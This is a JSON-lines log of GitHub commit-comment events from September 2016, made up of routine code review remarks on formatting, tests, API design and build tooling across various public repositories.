{"id":"4625992520","type":"CommitCommentEvent","actor":{"login":"OplGerman"},"repo":{"name":"ccldev/v2-compile-sytems"},"payload":{"comment":{"id":19195416,"position":null,"line":null,"path":null,"commit_id":"b27e59cdf2edea94e151de024b855e8f37b93aeb","created_at":"2016-09-27T18:15:31Z","updated_at":"2016-09-27T18:15:31Z","body":"@MineJoke Examples can be found at https://github.com/ccldev/use-ccl"}},"created_at":"2016-09-27T18:15:31Z"}
{"id":"4625993477","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19195421,"position":null,"line":null,"path":null,"commit_id":"198c6a3cffe4df717545e75a97f01510aa6a1875","created_at":"2016-09-27T18:15:40Z","updated_at":"2016-09-27T18:15:40Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-27T18:15:40Z"}
{"id":"4625998241","type":"CommitCommentEvent","actor":{"login":"bdeining"},"repo":{"name":"mweser/alliance"},"payload":{"comment":{"id":19195432,"position":123,"line":123,"path":"catalog/nsili/catalog-nsili-endpoint/src/main/java/org/codice/alliance/nsili/endpoint/EmailSenderImpl.java","commit_id":"7f99215b72f6f387e09ecf5b6e927ad5b2134b3a","created_at":"2016-09-27T18:16:31Z","updated_at":"2016-09-27T18:16:31Z","body":"Does this temp file ever get deleted?"}},"created_at":"2016-09-27T18:16:31Z"}
{"id":"4626001381","type":"CommitCommentEvent","actor":{"login":"joerg-krause"},"repo":{"name":"mikebrady/shairport-sync"},"payload":{"comment":{"id":19195447,"position":null,"line":null,"path":null,"commit_id":"d9b28443fc0e465f41dbe54371a1c8ca62c2be6e","created_at":"2016-09-27T18:17:07Z","updated_at":"2016-09-27T18:17:07Z","body":"Is the lower level of dithering happening when using the ALSA softvol plugin, or does it only happen for the internal volume control?"}},"created_at":"2016-09-27T18:17:07Z"}
{"id":"4626001914","type":"CommitCommentEvent","actor":{"login":"oliviertassinari"},"repo":{"name":"oliviertassinari/react-swipeable-views"},"payload":{"comment":{"id":19195450,"position":null,"line":null,"path":null,"commit_id":"85bdf1e47573463302cae4243684ade6db6d5aa0","created_at":"2016-09-27T18:17:12Z","updated_at":"2016-09-27T18:17:12Z","body":"I have updated the website. It's live 🌍 ."}},"created_at":"2016-09-27T18:17:12Z"}
{"id":"4626002747","type":"CommitCommentEvent","actor":{"login":"bdeining"},"repo":{"name":"mweser/alliance"},"payload":{"comment":{"id":19195453,"position":40,"line":40,"path":"catalog/nsili/catalog-nsili-endpoint/src/main/java/org/codice/alliance/nsili/endpoint/EmailSender.java","commit_id":"7f99215b72f6f387e09ecf5b6e927ad5b2134b3a","created_at":"2016-09-27T18:17:21Z","updated_at":"2016-09-27T18:17:21Z","body":"Should this take an argument?"}},"created_at":"2016-09-27T18:17:21Z"}
{"id":"4626003601","type":"CommitCommentEvent","actor":{"login":"Amarender2"},"repo":{"name":"Amarender2/RESTWebServices"},"payload":{"comment":{"id":19195459,"position":null,"line":null,"path":null,"commit_id":"42e46d85bf8b64a568d965a42eff4f73775fec88","created_at":"2016-09-27T18:17:30Z","updated_at":"2016-09-27T18:17:30Z","body":"Add Header : Content Type: application/json\r\nAdd Body: Sample JSON "}},"created_at":"2016-09-27T18:17:30Z"}
{"id":"4626004171","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195460,"position":25,"line":49,"path":"lib/node_modules/@stdlib/utils/unzip/README.md","commit_id":"b79a7b92c62a115bef2f816bd2af396fd757dc17","created_at":"2016-09-27T18:17:36Z","updated_at":"2016-09-27T18:17:36Z","body":"Typo. "}},"created_at":"2016-09-27T18:17:36Z"}
{"id":"4626005514","type":"CommitCommentEvent","actor":{"login":"RehabMan"},"repo":{"name":"RehabMan/Intel-NUC-DSDT-Patch"},"payload":{"comment":{"id":19195463,"position":null,"line":null,"path":null,"commit_id":"8c40056634b520f0e6fb3517c4b83381dba19409","created_at":"2016-09-27T18:17:50Z","updated_at":"2016-09-27T18:17:50Z","body":"Broadwell and Skylake do not necessarily need FakePCIID."}},"created_at":"2016-09-27T18:17:50Z"}
{"id":"4626005630","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"DenisCarriere/geocoder"},"payload":{"comment":{"id":19195464,"position":null,"line":null,"path":null,"commit_id":"4c965abc38f3b8686ae98b53bf49028275605b20","created_at":"2016-09-27T18:17:51Z","updated_at":"2016-09-27T18:17:51Z","body":"@themiurgo Correct, I don't want to create an entirely new class just because of the rate limiting.\r\n\r\nAlso once we can dynamically change the rate limit, the user could remove the rate limit by providing a parameter.\r\n\r\n**Example**\r\n\r\n```python\r\n>>> geocoder.google(\"Canada\", rate_limit=false)\r\n```"}},"created_at":"2016-09-27T18:17:51Z"}
{"id":"4626009688","type":"CommitCommentEvent","actor":{"login":"DRGabdulhakova"},"repo":{"name":"DRGabdulhakova/Informatics"},"payload":{"comment":{"id":19195480,"position":null,"line":null,"path":null,"commit_id":"89f019d515923c5818dad4a73cd14a2f42f6173c","created_at":"2016-09-27T18:18:34Z","updated_at":"2016-09-27T18:18:34Z","body":"15/09"}},"created_at":"2016-09-27T18:18:34Z"}
{"id":"4626011485","type":"CommitCommentEvent","actor":{"login":"ravilushqa"},"repo":{"name":"mkutin/Learning"},"payload":{"comment":{"id":19195485,"position":null,"line":null,"path":null,"commit_id":"a700423ac082ee0e893b813a9d0cd2f4377c2ec4","created_at":"2016-09-27T18:18:54Z","updated_at":"2016-09-27T18:18:54Z","body":"daun blyat"}},"created_at":"2016-09-27T18:18:54Z"}
{"id":"4626011638","type":"CommitCommentEvent","actor":{"login":"gabibrant"},"repo":{"name":"ethereum/wiki"},"payload":{"comment":{"id":19195486,"position":null,"line":null,"path":null,"commit_id":"8e519f100e5361f3fc5e52fcf050347d0357ad15","created_at":"2016-09-27T18:18:55Z","updated_at":"2016-09-27T18:18:55Z","body":"hi"}},"created_at":"2016-09-27T18:18:55Z"}
{"id":"4626015373","type":"CommitCommentEvent","actor":{"login":"rizhang"},"repo":{"name":"sharethrough/Android-SDK"},"payload":{"comment":{"id":19195498,"position":20,"line":93,"path":"src/main/java/com/sharethrough/sdk/Sharethrough.java","commit_id":"c908cae4063899102beb98789433d399973972aa","created_at":"2016-09-27T18:19:38Z","updated_at":"2016-09-27T18:19:38Z","body":"Check for \"isChild\" key without for loop"}},"created_at":"2016-09-27T18:19:38Z"}
{"id":"4626021520","type":"CommitCommentEvent","actor":{"login":"bdeining"},"repo":{"name":"mweser/alliance"},"payload":{"comment":{"id":19195519,"position":9,"line":54,"path":"catalog/nsili/catalog-nsili-endpoint/src/main/resources/OSGI-INF/metatype/org.codice.alliance.nsili.endpoint.xml","commit_id":"7f99215b72f6f387e09ecf5b6e927ad5b2134b3a","created_at":"2016-09-27T18:20:40Z","updated_at":"2016-09-27T18:20:40Z","body":"I would just have `The hostname of the mail server` here"}},"created_at":"2016-09-27T18:20:40Z"}
{"id":"4626021731","type":"CommitCommentEvent","actor":{"login":"drvinceknight"},"repo":{"name":"theref/FinalYearProject-Manuscript"},"payload":{"comment":{"id":19195521,"position":5,"line":23,"path":"tex/frontcover.tex","commit_id":"1f6a12c6b13b667b4bbd8a5ea174f519f5c136b0","created_at":"2016-09-27T18:20:42Z","updated_at":"2016-09-27T18:20:42Z","body":"Were you getting compilation errors because of this file?\r\n\r\nThat might be because of your latex compilation choice. I would suggest you use `xelatex` which is one of the most modern ones and basically handles everything (including image files like `eps`)."}},"created_at":"2016-09-27T18:20:42Z"}
{"id":"4626022933","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195523,"position":12,"line":12,"path":"lib/node_modules/@stdlib/utils/object-inverse/lib/index.js","commit_id":"8c2716208bd2ae0f95dc2d8dd159e4a13256d095","created_at":"2016-09-27T18:20:54Z","updated_at":"2016-09-27T18:20:54Z","body":"Spacing looks a bit off here. I believe tabs have been used."}},"created_at":"2016-09-27T18:20:54Z"}
{"id":"4626023624","type":"CommitCommentEvent","actor":{"login":"kylewm"},"repo":{"name":"kylewm/brevity"},"payload":{"comment":{"id":19195524,"position":null,"line":null,"path":null,"commit_id":"ea2130f4e2b9cbc9ec376b9d002d871759c6be27","created_at":"2016-09-27T18:21:01Z","updated_at":"2016-09-27T18:21:01Z","body":"oops yes, I will take a look at those tests tonight or tomorrow. /me makes the lame excuse for breaking changes of being < 1.0 ... probably a good reason to do a proper 1.0 release."}},"created_at":"2016-09-27T18:21:01Z"}
{"id":"4626025396","type":"CommitCommentEvent","actor":{"login":"bdeining"},"repo":{"name":"mweser/alliance"},"payload":{"comment":{"id":19195527,"position":63,"line":96,"path":"catalog/nsili/catalog-nsili-endpoint/src/test/java/org/codice/alliance/nsili/endpoint/OrderRequestImplTest.java","commit_id":"7f99215b72f6f387e09ecf5b6e927ad5b2134b3a","created_at":"2016-09-27T18:21:21Z","updated_at":"2016-09-27T18:21:21Z","body":"If you have `throws Exception`, you shouldn't need to specify any of the other exceptions here"}},"created_at":"2016-09-27T18:21:21Z"}
{"id":"4626026357","type":"CommitCommentEvent","actor":{"login":"tonytej"},"repo":{"name":"tonytej/GetSubtitle"},"payload":{"comment":{"id":19195530,"position":null,"line":null,"path":null,"commit_id":"127273bd504c488eab9e2737d846cb5c0b3ae203","created_at":"2016-09-27T18:21:31Z","updated_at":"2016-09-27T18:21:31Z","body":"Deleted irrelevant syntax."}},"created_at":"2016-09-27T18:21:31Z"}
{"id":"4626027606","type":"CommitCommentEvent","actor":{"login":"cmarkello"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19195533,"position":66,"line":66,"path":"src/toil_scripts/vg_evaluation_pipeline/README.md","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-27T18:21:44Z","updated_at":"2016-09-27T18:21:44Z","body":"By default it's set to false, so the user would have to pass --overwrite to set that argument to True. I'd think that it would be better for the user in the case they did not want to accidentally overwrite any local files if he/she didn't intend."}},"created_at":"2016-09-27T18:21:44Z"}
{"id":"4626028041","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195535,"position":8,"line":8,"path":"lib/node_modules/@stdlib/utils/object-inverse/lib/object_inverse.js","commit_id":"8c2716208bd2ae0f95dc2d8dd159e4a13256d095","created_at":"2016-09-27T18:21:50Z","updated_at":"2016-09-27T18:21:50Z","body":"External modules should be listed before internal modules. Order is native, external, internal, local."}},"created_at":"2016-09-27T18:21:50Z"}
{"id":"4626030838","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195542,"position":23,"line":23,"path":"lib/node_modules/@stdlib/utils/object-inverse/lib/object_inverse.js","commit_id":"8c2716208bd2ae0f95dc2d8dd159e4a13256d095","created_at":"2016-09-27T18:22:19Z","updated_at":"2016-09-27T18:22:19Z","body":"Tabs to spaces."}},"created_at":"2016-09-27T18:22:19Z"}
{"id":"4626034780","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195553,"position":62,"line":62,"path":"lib/node_modules/@stdlib/utils/object-inverse/lib/object_inverse.js","commit_id":"8c2716208bd2ae0f95dc2d8dd159e4a13256d095","created_at":"2016-09-27T18:23:00Z","updated_at":"2016-09-27T18:23:00Z","body":"Use hasOwnProperty utility."}},"created_at":"2016-09-27T18:23:00Z"}
{"id":"4626036215","type":"CommitCommentEvent","actor":{"login":"cmarkello"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19195558,"position":431,"line":431,"path":"src/toil_scripts/dockered_chunked_call.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-27T18:23:14Z","updated_at":"2016-09-27T18:23:14Z","body":"That's because main() in `dockered_chunked_call.py` isn't called at all. Main() in this script should be removed since it serves no purpose in this context. The same applies to `call_chunk`. \r\n`dockered_chunked_call.py` in this package is mainly just a python module and not it's own self-sufficient script."}},"created_at":"2016-09-27T18:23:14Z"}
{"id":"4626036583","type":"CommitCommentEvent","actor":{"login":"EmilyK"},"repo":{"name":"shaunvadaketh/blogful"},"payload":{"comment":{"id":19195561,"position":4,"line":3,"path":"blog/templates/delete.html","commit_id":"ad8492f2ec2b5d158679b2f15287e65dbe2750e3","created_at":"2016-09-27T18:23:17Z","updated_at":"2016-09-27T18:23:17Z","body":"@shaunvadaketh your delete is not working right because you didn't extend the base template which loads jquery. Please add this at the top this template.\r\n`{% extends \"base.html\" %}`\r\n\r\nAlso add blocks to load your template nicely. `{% block content %} {% endblock %}`\r\n\r\n See this gist for full details: https://gist.github.com/EmilyK/569f255362bbedbebb068b4221a27438\r\n"}},"created_at":"2016-09-27T18:23:17Z"}
{"id":"4626037412","type":"CommitCommentEvent","actor":{"login":"bnussey"},"repo":{"name":"argonjs/nativescript-screen-orientation"},"payload":{"comment":{"id":19195563,"position":null,"line":null,"path":null,"commit_id":"d18a3bb17fd986f7843efd0b81e2727ff91a3a07","created_at":"2016-09-27T18:23:27Z","updated_at":"2016-09-27T18:23:27Z","body":"Hey @blairmacintyre exactly as you've said, it goes into the correct orientation but it doesn't lock it in. I believe this was working in previous versions. Any ideas on how to resolve this?"}},"created_at":"2016-09-27T18:23:27Z"}
{"id":"4626040511","type":"CommitCommentEvent","actor":{"login":"bdeining"},"repo":{"name":"mweser/alliance"},"payload":{"comment":{"id":19195573,"position":14,"line":146,"path":"distribution/sdk/sample-nsili-client/src/main/java/org/codice/alliance/nsili/client/NsiliClient.java","commit_id":"7f99215b72f6f387e09ecf5b6e927ad5b2134b3a","created_at":"2016-09-27T18:23:59Z","updated_at":"2016-09-27T18:23:59Z","body":"We should allow this to be passed in as an argument rather than specifying it as a constant"}},"created_at":"2016-09-27T18:23:59Z"}
{"id":"4626040697","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195574,"position":18,"line":18,"path":"lib/node_modules/@stdlib/utils/object-inverse/test/test.js","commit_id":"8c2716208bd2ae0f95dc2d8dd159e4a13256d095","created_at":"2016-09-27T18:24:01Z","updated_at":"2016-09-27T18:24:01Z","body":"Spacing is off here. Extra tab."}},"created_at":"2016-09-27T18:24:01Z"}
{"id":"4626042985","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195582,"position":155,"line":155,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T18:24:26Z","updated_at":"2016-09-27T18:24:26Z","body":"I feel like `Traverse` and `InOrder` are fairly limiting APIs. What if I wanted to go in pre-order or post-order? What if I didn't want to store the values and only wanted to print them?\r\n\r\nWhat about the following API?\r\n```go\r\nconst (\r\n\tPreOrder = iota\r\n\tInOrder\r\n\tPostOrder\r\n)\r\n\r\n// Traverse traverses through the tree according to the given order.\r\n//\r\n// For each element, it calls handle with the current Value.\r\n// Traversal continues so long as handle returns true.\r\nfunc (tree *Tree) Traverse(order int, handle func(*Value) bool) {\r\n\t...\r\n}\r\n```\r\n\r\nI believe this API is more powerful because:\r\n* It is trivial to get the minimum or maximum this way.\r\n* It can be used to simply print out all the elements without storing them\r\n* You have a single Traverse method rather one for each order (e.g., TraverseInOrder, TraversePostOrder, TraversePreOrder, TraverseLevelOrder, etc).\r\n* You can easily write a handle function that only traverses on the first 10 elements or something."}},"created_at":"2016-09-27T18:24:26Z"}
{"id":"4626043066","type":"CommitCommentEvent","actor":{"login":"drvinceknight"},"repo":{"name":"theref/FinalYearProject-Manuscript"},"payload":{"comment":{"id":19195584,"position":5,"line":23,"path":"tex/frontcover.tex","commit_id":"1f6a12c6b13b667b4bbd8a5ea174f519f5c136b0","created_at":"2016-09-27T18:24:27Z","updated_at":"2016-09-27T18:24:27Z","body":"So instead of `pdflatex main.tex`, you'd go for `xelatex main.tex`. Having said that I recommend `latexmk` which is a `make` but for `text` so I compile with:\r\n\r\n```\r\nlatexmk --xelatex -shell-escape main.tex\r\n```\r\n\r\nThe `-shell-escape` is thrown in there as an extra, you'll need that if you want to use the `minted` package for syntax highlighting."}},"created_at":"2016-09-27T18:24:27Z"}
{"id":"4626044653","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195595,"position":129,"line":129,"path":"lib/node_modules/@stdlib/utils/object-inverse/test/test.js","commit_id":"8c2716208bd2ae0f95dc2d8dd159e4a13256d095","created_at":"2016-09-27T18:24:42Z","updated_at":"2016-09-27T18:24:42Z","body":"Include a test message."}},"created_at":"2016-09-27T18:24:42Z"}
{"id":"4626045314","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195598,"position":151,"line":151,"path":"lib/node_modules/@stdlib/utils/object-inverse/test/test.js","commit_id":"8c2716208bd2ae0f95dc2d8dd159e4a13256d095","created_at":"2016-09-27T18:24:49Z","updated_at":"2016-09-27T18:24:49Z","body":"Include a test message."}},"created_at":"2016-09-27T18:24:49Z"}
{"id":"4626046318","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195603,"position":171,"line":171,"path":"lib/node_modules/@stdlib/utils/object-inverse/test/test.js","commit_id":"8c2716208bd2ae0f95dc2d8dd159e4a13256d095","created_at":"2016-09-27T18:25:00Z","updated_at":"2016-09-27T18:25:00Z","body":"Include a test message.\r\n"}},"created_at":"2016-09-27T18:25:00Z"}
{"id":"4626048108","type":"CommitCommentEvent","actor":{"login":"Morik"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19195605,"position":17,"line":71,"path":"wcfsetup/install/files/lib/system/importer/UserAvatarImporter.class.php","commit_id":"71419f8cd32a849b86f92787c558565ae3b2772a","created_at":"2016-09-27T18:25:17Z","updated_at":"2016-09-27T18:25:17Z","body":"Wouldn't it be better to catch exceptions and delete avatars if shrinking fails?\r\nThere have been several Problems with damaged images which couldn't be catched with this implementation."}},"created_at":"2016-09-27T18:25:17Z"}
{"id":"4626048969","type":"CommitCommentEvent","actor":{"login":"josephwilliams"},"repo":{"name":"josephwilliams/friendzone"},"payload":{"comment":{"id":19195606,"position":5,"line":147,"path":"css/master.css","commit_id":"56d7962e0f8386b1929d00efc6f1550be6ec26c5","created_at":"2016-09-27T18:25:26Z","updated_at":"2016-09-27T18:25:26Z","body":"it's divided by the `divider` div.  I'm not opposed to changing the style but the full background blue was clashing hard with the bar graph."}},"created_at":"2016-09-27T18:25:26Z"}
{"id":"4626049088","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195607,"position":191,"line":191,"path":"lib/node_modules/@stdlib/utils/object-inverse/test/test.js","commit_id":"8c2716208bd2ae0f95dc2d8dd159e4a13256d095","created_at":"2016-09-27T18:25:27Z","updated_at":"2016-09-27T18:25:27Z","body":"Include a test message; e.g., `t.deepEqual( actual, expected, 'ignores unknown options' );`."}},"created_at":"2016-09-27T18:25:27Z"}
{"id":"4626051343","type":"CommitCommentEvent","actor":{"login":"TitusPiJean"},"repo":{"name":"TitusPiJean/seafile_ynh"},"payload":{"comment":{"id":19195614,"position":null,"line":null,"path":null,"commit_id":"83ea56e8973e5ced0f452038778e523a6e3723e3","created_at":"2016-09-27T18:25:49Z","updated_at":"2016-09-27T18:25:49Z","body":"Adding 6.0.4 references"}},"created_at":"2016-09-27T18:25:49Z"}
{"id":"4626052290","type":"CommitCommentEvent","actor":{"login":"EthanCJ"},"repo":{"name":"3cmd9/TheCalculatzar2016"},"payload":{"comment":{"id":19195620,"position":2,"line":2,"path":"README.md","commit_id":"22899679fba5db83f534fb8cead7d5cebb8b195c","created_at":"2016-09-27T18:25:58Z","updated_at":"2016-09-27T18:25:58Z","body":"Debatable"}},"created_at":"2016-09-27T18:25:58Z"}
{"id":"4626053009","type":"CommitCommentEvent","actor":{"login":"cmarkello"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19195623,"position":9,"line":9,"path":"src/toil_scripts/dockered_chunked_call.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-27T18:26:06Z","updated_at":"2016-09-27T18:26:06Z","body":"That should be removed."}},"created_at":"2016-09-27T18:26:06Z"}
{"id":"4626054709","type":"CommitCommentEvent","actor":{"login":"sethp-jive"},"repo":{"name":"openzipkin/zipkin"},"payload":{"comment":{"id":19195631,"position":72,"line":67,"path":"zipkin-autoconfigure/storage-elasticsearch-aws/src/main/java/zipkin/autoconfigure/storage/elasticsearch/aws/AwsSignatureInterceptor.java","commit_id":"58fa61a78af904dd775dff571e930f95b4e78815","created_at":"2016-09-27T18:26:23Z","updated_at":"2016-09-27T18:26:23Z","body":"I think it would only be used as a \"is this thing on\"? kind of mic check – that's all I ever intended to use it for,  anyway, so that's true to whatever extent my preferences are general. I think waiting for anonymous access is a fine plan!"}},"created_at":"2016-09-27T18:26:23Z"}
{"id":"4626056262","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195636,"position":25,"line":25,"path":"lib/node_modules/@stdlib/utils/pluck/README.md","commit_id":"24f87b6bf3d7865a4d5ca4b2be60252b873c3a73","created_at":"2016-09-27T18:26:39Z","updated_at":"2016-09-27T18:26:39Z","body":"Spacing looks off here. Is this `4` spaces? `{` should be aligned with `a`."}},"created_at":"2016-09-27T18:26:39Z"}
{"id":"4626057067","type":"CommitCommentEvent","actor":{"login":"tuffnatty"},"repo":{"name":"LibreOffice/core"},"payload":{"comment":{"id":19195639,"position":null,"line":null,"path":null,"commit_id":"f8c875a6e9e95120dcd16f7c96e0fbbaa0a3784c","created_at":"2016-09-27T18:26:46Z","updated_at":"2016-09-27T18:26:46Z","body":"This hack is no longer needed starting with HarfBuzz version 1.3.2"}},"created_at":"2016-09-27T18:26:46Z"}
{"id":"4626057869","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195645,"position":31,"line":31,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T18:26:54Z","updated_at":"2016-09-27T18:26:54Z","body":"You can use the phrase \"reports whether\" anything you see yourself saying \"returns true if ... , false otherwise\""}},"created_at":"2016-09-27T18:26:54Z"}
{"id":"4626058351","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195646,"position":34,"line":34,"path":"lib/node_modules/@stdlib/utils/pluck/README.md","commit_id":"24f87b6bf3d7865a4d5ca4b2be60252b873c3a73","created_at":"2016-09-27T18:26:59Z","updated_at":"2016-09-27T18:26:59Z","body":"Insert a newline before `*`."}},"created_at":"2016-09-27T18:26:59Z"}
{"id":"4626059363","type":"CommitCommentEvent","actor":{"login":"mipapo"},"repo":{"name":"Runalyze/Runalyze"},"payload":{"comment":{"id":19195651,"position":null,"line":null,"path":null,"commit_id":"5489caa1d1f3328104d35805da21f278e490f6d7","created_at":"2016-09-27T18:27:10Z","updated_at":"2016-09-27T18:27:10Z","body":"Would it not be better to skip those entries and count the \"failures\" and throw a exception if they happen too often?\r\nLike in  #1917"}},"created_at":"2016-09-27T18:27:10Z"}
{"id":"4626059863","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195653,"position":40,"line":40,"path":"lib/node_modules/@stdlib/utils/pluck/README.md","commit_id":"24f87b6bf3d7865a4d5ca4b2be60252b873c3a73","created_at":"2016-09-27T18:27:15Z","updated_at":"2016-09-27T18:27:15Z","body":"Spacing."}},"created_at":"2016-09-27T18:27:15Z"}
{"id":"4626060761","type":"CommitCommentEvent","actor":{"login":"Speaqer"},"repo":{"name":"Adversities/Hadow"},"payload":{"comment":{"id":19195655,"position":null,"line":null,"path":null,"commit_id":"2eaae690f543cb50ac241f69ed8ff207c6c67afc","created_at":"2016-09-27T18:27:24Z","updated_at":"2016-09-27T18:27:24Z","body":"Great great!"}},"created_at":"2016-09-27T18:27:24Z"}
{"id":"4626060951","type":"CommitCommentEvent","actor":{"login":"timburrow"},"repo":{"name":"OpenVnmrJ/OpenVnmrJ"},"payload":{"comment":{"id":19195659,"position":null,"line":null,"path":null,"commit_id":"e0d0ff9fb2400e3fe9fc40314607482871d9e911","created_at":"2016-09-27T18:27:26Z","updated_at":"2016-09-27T18:27:26Z","body":"Is it OK to PR where we are now in development over to master? I won't squash, so you can retrieve your commit point.\r\n\r\nSee the screen shot I have for making a pull request; does branch, tag, commit or history marker work? I just assumed it would.\r\n\r\n![screen shot 2016-09-27 at 2 18 05 pm](https://cloud.githubusercontent.com/assets/3519577/18886299/4eb5c214-84bd-11e6-864a-dbd041a0d7ed.png)\r\n\r\nSmall thing: the installed OVJ has a date in /vnmr/vnmrrev but no git hash, which is in /vnmr/adm/sha1. Was it decided that the hash was too confusing to be in the text window?"}},"created_at":"2016-09-27T18:27:26Z"}
{"id":"4626061197","type":"CommitCommentEvent","actor":{"login":"dlebauer"},"repo":{"name":"terraref/computing-pipeline"},"payload":{"comment":{"id":19195660,"position":22,"line":74,"path":"scripts/hyperspectral/hyperspectral_calibration.nco","commit_id":"e6a540a6ac40bff4201d46c43bfd0f7a787ca81e","created_at":"2016-09-27T18:27:28Z","updated_at":"2016-09-27T18:27:28Z","body":"@czender certainly a good place to start but note that this is not the calibration for the target that we are using. That said, I am curious how stable these numbers are over time (e.g. as the target gets dirty).\r\n\r\n@craig-willis this is the type of data that should be stored (somewhere) and accessed / updated programatically if possible, because we may use >1 target."}},"created_at":"2016-09-27T18:27:28Z"}
{"id":"4626063913","type":"CommitCommentEvent","actor":{"login":"raoc999"},"repo":{"name":"ingbrzy/MA-XML-8.0-TURKISH"},"payload":{"comment":{"id":19195671,"position":null,"line":null,"path":null,"commit_id":"27bad2df19fb75d4c7e843aff8d9f994b16fe619","created_at":"2016-09-27T18:27:55Z","updated_at":"2016-09-27T18:27:55Z","body":"ok"}},"created_at":"2016-09-27T18:27:55Z"}
{"id":"4626064004","type":"CommitCommentEvent","actor":{"login":"cmarkello"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19195672,"position":89,"line":89,"path":"src/toil_scripts/dockered_chunked_call.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-27T18:27:56Z","updated_at":"2016-09-27T18:27:56Z","body":"Buffer what exactly? The functions?\r\n\r\nOn second look the `run` function isn't use anywhere, so that should be removed.\r\nAnd the `get_files_by_file_size` is just a helper function for debugging purposes, so that should also be removed."}},"created_at":"2016-09-27T18:27:56Z"}
{"id":"4626066293","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195680,"position":90,"line":90,"path":"lib/node_modules/@stdlib/utils/pluck/README.md","commit_id":"24f87b6bf3d7865a4d5ca4b2be60252b873c3a73","created_at":"2016-09-27T18:28:17Z","updated_at":"2016-09-27T18:28:17Z","body":"Fix require statement to use `stdlib` module"}},"created_at":"2016-09-27T18:28:17Z"}
{"id":"4626068318","type":"CommitCommentEvent","actor":{"login":"cmarkello"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19195684,"position":20,"line":20,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-27T18:28:39Z","updated_at":"2016-09-27T18:28:39Z","body":"Agreed, this should be cleaned up."}},"created_at":"2016-09-27T18:28:39Z"}
{"id":"4626070081","type":"CommitCommentEvent","actor":{"login":"mcnewton"},"repo":{"name":"FreeRADIUS/freeradius-server"},"payload":{"comment":{"id":19195690,"position":null,"line":null,"path":null,"commit_id":"f187105df7bfe3e98a14d1c6517565a51dd5f19f","created_at":"2016-09-27T18:28:56Z","updated_at":"2016-09-27T18:28:56Z","body":"np"}},"created_at":"2016-09-27T18:28:56Z"}
{"id":"4626070272","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195692,"position":144,"line":144,"path":"lib/node_modules/@stdlib/utils/pluck/README.md","commit_id":"24f87b6bf3d7865a4d5ca4b2be60252b873c3a73","created_at":"2016-09-27T18:28:58Z","updated_at":"2016-09-27T18:28:58Z","body":"This is not valid Markdown comment syntax."}},"created_at":"2016-09-27T18:28:58Z"}
